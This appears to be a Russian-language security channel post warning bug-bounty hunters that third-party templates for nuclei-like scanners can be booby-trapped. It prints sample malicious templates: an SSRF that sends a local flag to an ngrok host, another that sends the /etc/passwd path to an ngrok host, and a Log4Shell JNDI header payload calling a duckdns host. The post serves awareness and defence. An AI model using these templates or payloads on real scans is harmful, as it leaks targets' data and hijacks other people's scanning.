Сегодня речь пойдет про сканеры безопасности. Как неожиданно, но довольно интересно. Обычно, это они же нам помогают искать уязвимости и зарабатывать деньги репутацию на багбаунти.
О каких opensource сканерах мы знаем? Ну... там nuclei, ZAP, может что-то менее известное, например arachni (продались, а движок был интересный, в своё время) или же jaeles, который схож темплейтами с nuclei. А может никому не известный Artemis, да, он тоже работает с темплейтами.
❌ Тёмная сторона сканеров или как ваши таргеты летят другим людям
Вот вроде бы всё замечательно со сканерами работающими на темплейтах. Легко добавлять новые CVE и POC, легко управлять сканированием используя теги. Даже комьюнити развивает и пишет что-то своё для себя и в GitHub. А только ли ради сообщества это делают?
Возможно, но не все. Не одной CVE едины. Стоит вспомнить CVE-2021-21224, которая позволяла получить RCE через темплейт nuclei можете попробовать установив старую версию (исключительно в образовательных целях). Благо с выходом версии nuclei 3.0 code-based можно запускать только с использованием
-code и только подписанные. А что с другими сканерами... пока не ясно ❌ А что сейчас могут подсунуть?
👉 SSRF
requests:
- method: GET
path:
- "http://127.0.0.1:1337/flag"
- "http://111111111111.ngrok.io/{{base64(output)}}"
extractors:
- type: regex
name: output
part: body
internal: true
👉 Local File Read
requests:
- method: GET
payloads:
passwd: /etc/passwd
path:
- "https://111111111111.ngrok.io/{{passwd}}"
👉 Перехват Log4shell (реальный пример)
requests:
- raw:
- |+
GET / HTTP/1.1
{{header}}: ${jndi:ldap://labdalab.duckdns.org:4567/a}
payloads:
header:
- User-Agent
Вот и думайте, когда запускаете nuclei-подобные сканеры. Используйте только проверенные, самописные или находящиеся на этапе валидации.
🎁 Ниже представлен инструмент для скачивания легитимных, но пока ещё не валидированных темплейтов (спасибо @reewardiwe).
💻 GitHub - Ссылка
📌
НЕ ИСПОЛЬЗУЙТЕ cent и подобные парсеры гита для обогащения базы.
#redteam